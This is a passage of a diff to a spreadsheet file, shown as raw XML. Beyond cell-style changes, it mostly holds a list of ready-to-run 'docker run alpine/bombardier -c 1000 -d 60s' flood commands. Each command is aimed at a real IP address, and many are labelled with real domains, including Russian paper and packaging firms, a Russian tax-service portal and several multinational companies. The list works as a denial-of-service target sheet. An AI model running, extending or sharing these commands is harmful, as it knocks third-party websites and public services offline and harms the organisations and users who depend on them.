-      <c r="C272" s="3"/>
+      <c r="A272" s="2"/>
+      <c r="B272" s="2"/>
+      <c r="C272" s="2"/>
       <c r="D272" s="3"/>
       <c r="E272" s="3"/>
     </row>
     <row r="273" ht="15.35" customHeight="1">
-      <c r="A273" s="3"/>
-      <c r="B273" s="3"/>
-      <c r="C273" s="3"/>
+      <c r="A273" s="2"/>
+      <c r="B273" s="2"/>
+      <c r="C273" s="2"/>
       <c r="D273" s="3"/>
       <c r="E273" s="3"/>
     </row>
     <row r="274" ht="15.35" customHeight="1">
-      <c r="A274" s="3"/>
-      <c r="B274" s="3"/>
-      <c r="C274" s="3"/>
+      <c r="A274" s="2"/>
+      <c r="B274" s="2"/>
+      <c r="C274" s="2"/>
       <c r="D274" s="3"/>
       <c r="E274" s="3"/>
     </row>
     <row r="275" ht="15.35" customHeight="1">
-      <c r="A275" s="3"/>
-      <c r="B275" s="3"/>
-      <c r="C275" s="3"/>
+      <c r="A275" s="2"/>
+      <c r="B275" s="2"/>
+      <c r="C275" s="2"/>
       <c r="D275" s="3"/>
       <c r="E275" s="3"/>
     </row>
     <row r="276" ht="15.35" customHeight="1">
-      <c r="A276" s="3"/>
-      <c r="B276" s="3"/>
-      <c r="C276" s="3"/>
+      <c r="A276" s="2"/>
+      <c r="B276" s="2"/>
+      <c r="C276" s="2"/>
       <c r="D276" s="3"/>
       <c r="E276" s="3"/>
     </row>
     <row r="277" ht="15.35" customHeight="1">
-      <c r="A277" s="3"/>
-      <c r="B277" s="3"/>
-      <c r="C277" s="3"/>
+      <c r="A277" s="2"/>
+      <c r="B277" s="2"/>
+      <c r="C277" s="2"/>
       <c r="D277" s="3"/>
       <c r="E277" s="3"/>
     </row>
     <row r="278" ht="15.35" customHeight="1">
-      <c r="A278" s="3"/>
-      <c r="B278" s="3"/>
-      <c r="C278" s="3"/>
+      <c r="A278" s="2"/>
+      <c r="B278" s="2"/>
+      <c r="C278" s="2"/>
       <c r="D278" s="3"/>
       <c r="E278" s="3"/>
     </row>
     <row r="279" ht="15.35" customHeight="1">
-      <c r="A279" s="3"/>
-      <c r="B279" s="3"/>
-      <c r="C279" s="3"/>
+      <c r="A279" s="2"/>
+      <c r="B279" s="2"/>
+      <c r="C279" s="2"/>
       <c r="D279" s="3"/>
       <c r="E279" s="3"/>
     </row>
     <row r="280" ht="15.35" customHeight="1">
-      <c r="A280" s="3"/>
-      <c r="B280" s="3"/>
-      <c r="C280" s="3"/>
+      <c r="A280" s="2"/>
+      <c r="B280" s="2"/>
+      <c r="C280" s="2"/>
       <c r="D280" s="3"/>
       <c r="E280" s="3"/>
     </row>
     <row r="281" ht="15.35" customHeight="1">
-      <c r="A281" s="3"/>
-      <c r="B281" s="3"/>
-      <c r="C281" s="3"/>
+      <c r="A281" s="2"/>
+      <c r="B281" s="2"/>
+      <c r="C281" s="2"/>
       <c r="D281" s="3"/>
       <c r="E281" s="3"/>
     </row>
     <row r="282" ht="15.35" customHeight="1">
-      <c r="A282" s="3"/>
-      <c r="B282" s="3"/>
-      <c r="C282" s="3"/>
+      <c r="A282" s="2"/>
+      <c r="B282" s="2"/>
+      <c r="C282" s="2"/>
       <c r="D282" s="3"/>
       <c r="E282" s="3"/>
     </row>
     <row r="283" ht="15.35" customHeight="1">
-      <c r="A283" s="3"/>
-      <c r="B283" s="3"/>
-      <c r="C283" s="3"/>
+      <c r="A283" s="2"/>
+      <c r="B283" s="2"/>
+      <c r="C283" s="2"/>
       <c r="D283" s="3"/>
       <c r="E283" s="3"/>
     </row>
     <row r="284" ht="15.35" customHeight="1">
-      <c r="A284" s="3"/>
-      <c r="B284" s="3"/>
-      <c r="C284" s="3"/>
+      <c r="A284" s="2"/>
+      <c r="B284" s="2"/>
+      <c r="C284" s="2"/>
       <c r="D284" s="3"/>
       <c r="E284" s="3"/>
     </row>
     <row r="285" ht="15.35" customHeight="1">
-      <c r="A285" s="3"/>
-      <c r="B285" s="3"/>
-      <c r="C285" s="3"/>
+      <c r="A285" s="2"/>
+      <c r="B285" s="2"/>
+      <c r="C285" s="2"/>
       <c r="D285" s="3"/>
       <c r="E285" s="3"/>
     </row>
@@ -8185,6 +8408,160 @@
       <c r="C636" s="3"/>
       <c r="D636" s="3"/>
       <c r="E636" s="3"/>
+    </row>
+    <row r="637" ht="15.35" customHeight="1">
+      <c r="A637" s="3"/>
+      <c r="B637" s="3"/>
+      <c r="C637" s="3"/>
+      <c r="D637" s="3"/>
+      <c r="E637" s="3"/>
+    </row>
+    <row r="638" ht="15.35" customHeight="1">
+      <c r="A638" s="3"/>
+      <c r="B638" s="3"/>
+      <c r="C638" s="3"/>
+      <c r="D638" s="3"/>
+      <c r="E638" s="3"/>
+    </row>
+    <row r="639" ht="15.35" customHeight="1">
+      <c r="A639" s="3"/>
+      <c r="B639" s="3"/>
+      <c r="C639" s="3"/>
+      <c r="D639" s="3"/>
+      <c r="E639" s="3"/>
+    </row>
+    <row r="640" ht="15.35" customHeight="1">
+      <c r="A640" s="3"/>
+      <c r="B640" s="3"/>
+      <c r="C640" s="3"/>
+      <c r="D640" s="3"/>
+      <c r="E640" s="3"/>
+    </row>
+    <row r="641" ht="15.35" customHeight="1">
+      <c r="A641" s="3"/>
+      <c r="B641" s="3"/>
+      <c r="C641" s="3"/>
+      <c r="D641" s="3"/>
+      <c r="E641" s="3"/>
+    </row>
+    <row r="642" ht="15.35" customHeight="1">
+      <c r="A642" s="3"/>
+      <c r="B642" s="3"/>
+      <c r="C642" s="3"/>
+      <c r="D642" s="3"/>
+      <c r="E642" s="3"/>
+    </row>
+    <row r="643" ht="15.35" customHeight="1">
+      <c r="A643" s="3"/>
+      <c r="B643" s="3"/>
+      <c r="C643" s="3"/>
+      <c r="D643" s="3"/>
+      <c r="E643" s="3"/>
+    </row>
+    <row r="644" ht="15.35" customHeight="1">
+      <c r="A644" s="3"/>
+      <c r="B644" s="3"/>
+      <c r="C644" s="3"/>
+      <c r="D644" s="3"/>
+      <c r="E644" s="3"/>
+    </row>
+    <row r="645" ht="15.35" customHeight="1">
+      <c r="A645" s="3"/>
+      <c r="B645" s="3"/>
+      <c r="C645" s="3"/>
+      <c r="D645" s="3"/>
+      <c r="E645" s="3"/>
+    </row>
+    <row r="646" ht="15.35" customHeight="1">
+      <c r="A646" s="3"/>
+      <c r="B646" s="3"/>
+      <c r="C646" s="3"/>
+      <c r="D646" s="3"/>
+      <c r="E646" s="3"/>
+    </row>
+    <row r="647" ht="15.35" customHeight="1">
+      <c r="A647" s="3"/>
+      <c r="B647" s="3"/>
+      <c r="C647" s="3"/>
+      <c r="D647" s="3"/>
+      <c r="E647" s="3"/>
+    </row>
+    <row r="648" ht="15.35" customHeight="1">
+      <c r="A648" s="3"/>
+      <c r="B648" s="3"/>
+      <c r="C648" s="3"/>
+      <c r="D648" s="3"/>
+      <c r="E648" s="3"/>
+    </row>
+    <row r="649" ht="15.35" customHeight="1">
+      <c r="A649" s="3"/>
+      <c r="B649" s="3"/>
+      <c r="C649" s="3"/>
+      <c r="D649" s="3"/>
+      <c r="E649" s="3"/>
+    </row>
+    <row r="650" ht="15.35" customHeight="1">
+      <c r="A650" s="3"/>
+      <c r="B650" s="3"/>
+      <c r="C650" s="3"/>
+      <c r="D650" s="3"/>
+      <c r="E650" s="3"/>
+    </row>
+    <row r="651" ht="15.35" customHeight="1">
+      <c r="A651" s="3"/>
+      <c r="B651" s="3"/>
+      <c r="C651" s="3"/>
+      <c r="D651" s="3"/>
+      <c r="E651" s="3"/>
+    </row>
+    <row r="652" ht="15.35" customHeight="1">
+      <c r="A652" s="3"/>
+      <c r="B652" s="3"/>
+      <c r="C652" s="3"/>
+      <c r="D652" s="3"/>
+      <c r="E652" s="3"/>
+    </row>
+    <row r="653" ht="15.35" customHeight="1">
+      <c r="A653" s="3"/>
+      <c r="B653" s="3"/>
+      <c r="C653" s="3"/>
+      <c r="D653" s="3"/>
+      <c r="E653" s="3"/>
+    </row>
+    <row r="654" ht="15.35" customHeight="1">
+      <c r="A654" s="3"/>
+      <c r="B654" s="3"/>
+      <c r="C654" s="3"/>
+      <c r="D654" s="3"/>
+      <c r="E654" s="3"/>
+    </row>
+    <row r="655" ht="15.35" customHeight="1">
+      <c r="A655" s="3"/>
+      <c r="B655" s="3"/>
+      <c r="C655" s="3"/>
+      <c r="D655" s="3"/>
+      <c r="E655" s="3"/>
+    </row>
+    <row r="656" ht="15.35" customHeight="1">
+      <c r="A656" s="3"/>
+      <c r="B656" s="3"/>
+      <c r="C656" s="3"/>
+      <c r="D656" s="3"/>
+      <c r="E656" s="3"/>
+    </row>
+    <row r="657" ht="15.35" customHeight="1">
+      <c r="A657" s="3"/>
+      <c r="B657" s="3"/>
+      <c r="C657" s="3"/>
+      <c r="D657" s="3"/>
+      <c r="E657" s="3"/>
+    </row>
+    <row r="658" ht="15.35" customHeight="1">
+      <c r="A658" s="3"/>
+      <c r="B658" s="3"/>
+      <c r="C658" s="3"/>
+      <c r="D658" s="3"/>
+      <c r="E658" s="3"/>
     </row>
   </sheetData>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>

--- a/test.xlsx
+++ b/test.xlsx
@@ -11,7 +11,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="409">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="42">
   <si>
     <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.239.13&amp;&amp; sleep 5;</t>
   </si>
@@ -82,1208 +82,61 @@
     <t>178.248.236.218</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.217.20.1&amp;&amp; sleep 5;</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.66.78.124&amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>91.217.20.1</t>
+    <t>195.66.78.124</t>
   </si>
   <si>
-    <t>arkhbum.com</t>
+    <t>reso</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 148.251.9.18&amp;&amp; sleep 5;</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.66.78.60&amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>148.251.9.18</t>
+    <t>195.66.78.60</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 23.236.62.147&amp;&amp; sleep 5;</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.66.78.28&amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>23.236.62.147</t>
+    <t>195.66.78.28</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.74.216.63&amp;&amp; sleep 5;</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.66.78.140&amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>176.74.216.63</t>
+    <t>195.66.78.140</t>
   </si>
   <si>
-    <t>utupack.ru</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.66.78.234&amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.74.218.245&amp;&amp; sleep 5;</t>
+    <t>195.66.78.234</t>
   </si>
   <si>
-    <t>176.74.218.245</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.66.78.125&amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.74.219.91&amp;&amp; sleep 5;</t>
+    <t>195.66.78.125</t>
   </si>
   <si>
-    <t>176.74.219.91</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 78.155.198.90&amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.31.3.154&amp;&amp; sleep 5;</t>
+    <t>78.155.198.90</t>
   </si>
   <si>
-    <t>176.31.3.154</t>
+    <t>nornickel</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.138.25.51&amp;&amp; sleep 5;</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.210.21.54&amp;&amp; sleep 5;</t>
   </si>
   <si>
-    <t>188.138.25.51</t>
+    <t>195.210.21.54</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 136.243.223.232&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>136.243.223.232</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.74.222.29&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>176.74.222.29</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 108.162.193.170&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>108.162.193.170</t>
-  </si>
-  <si>
-    <t>rostovbumaga.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 108.162.192.139&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>108.162.192.139</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 172.67.163.236&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>172.67.163.236</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.66.196&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>104.21.66.196</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 92.127.158.62&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>92.127.158.62</t>
-  </si>
-  <si>
-    <t>sckkbur.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 92.127.158.61&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>92.127.158.61</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 92.127.158.63&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>92.127.158.63</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.226.223.50&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>91.226.223.50</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 141.8.192.54&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>141.8.192.54</t>
-  </si>
-  <si>
-    <t>karavaevo.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 172.105.85.119&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>172.105.85.119</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.87.203.101&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>80.87.203.101</t>
-  </si>
-  <si>
-    <t>ilimgroup.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 90.156.219.38&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>90.156.219.38</t>
-  </si>
-  <si>
-    <t>sckk.by</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.159.243.220&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>178.159.243.220</t>
-  </si>
-  <si>
-    <t>bmik-aquapack.by</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 142.250.27.26&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>142.250.27.26</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 64.233.184.26&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>64.233.184.26</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 209.85.202.27&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>209.85.202.27</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 142.250.153.26&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>142.250.153.26</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 64.233.184.27&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>64.233.184.27</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 142.251.111.26&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>142.251.111.26</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 86.57.246.186&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>86.57.246.186</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.159.250.29&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>178.159.250.29</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.159.252.109&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>178.159.252.109</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.17.150.118&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>188.17.150.118</t>
-  </si>
-  <si>
-    <t>pcbk.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.170.119.130&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>188.170.119.130</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.170.119.134&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>188.170.119.134</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.68.186.14&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>188.68.186.14</t>
-  </si>
-  <si>
-    <t>remos.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 198.185.159.144&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>198.185.159.144</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 46.173.190.195&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>46.173.190.195</t>
-  </si>
-  <si>
-    <t>akarton.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.172.11.199&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>85.172.11.199</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.24.64.138 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t xml:space="preserve">213.24.64.138 </t>
-  </si>
-  <si>
-    <t>lkdr.nalog.gov.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.110&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>213.33.55.110</t>
-  </si>
-  <si>
-    <t>mondigroup.com</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.147&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>213.33.55.147</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.121&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>213.33.55.121</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.108&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>213.33.55.108</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.99&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>213.33.55.99</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.227&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>213.33.55.227</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.144&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>213.33.55.144</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.141&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>213.33.55.141</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.101&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>213.33.55.101</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.236&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>213.33.55.236</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.232&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>213.33.55.232</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.97&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>213.33.55.97</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.204&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>213.33.55.204</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.221&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>213.33.55.221</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.220&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>213.33.55.220</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.54.8&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>213.33.54.8</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.95&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>213.33.55.95</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 160.109.17.100&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>160.109.17.100</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 197.97.68.205&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>197.97.68.205</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 217.69.139.180&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>217.69.139.180</t>
-  </si>
-  <si>
-    <t>gofrotara54.com</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 216.239.36.101&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>216.239.36.101</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 216.239.38.101&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>216.239.38.101</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.230.63.171&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.230.63.171</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.108.88.100&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.108.88.100</t>
-  </si>
-  <si>
-    <t>pkf39.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.108.88.102&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.108.88.102</t>
-  </si>
-  <si>
-    <t>kbkf.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 37.29.57.18&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>37.29.57.18</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 79.104.53.186&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>79.104.53.186</t>
-  </si>
-  <si>
-    <t>sftgroup.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 90.156.201.21&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>90.156.201.21</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.160.70&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>213.33.160.70</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.160.69&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>213.33.160.69</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.139.132.28&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>192.139.132.28</t>
-  </si>
-  <si>
-    <t>smurfitkappa.com</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.115.60.190&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>85.115.60.190</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 208.87.234.190&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>208.87.234.190</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.115.52.190&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>85.115.52.190</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.115.54.190&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>85.115.54.190</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.97.158.3&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>176.97.158.3</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.97.158.1&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>176.97.158.1</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.97.158.2&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>176.97.158.2</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.174.68.4&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>192.174.68.4</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.174.68.1&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>192.174.68.1</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.174.68.3&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>192.174.68.3</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.108.4.192&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>212.108.4.192</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.108.4.216&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>212.108.4.216</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.139.132.44&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>192.139.132.44</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 40.91.209.208&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>40.91.209.208</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.108.4.185&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>212.108.4.185</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.108.4.159&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>212.108.4.159</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.139.132.15&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>192.139.132.15</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.139.132.10&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>192.139.132.10</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.139.132.43&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
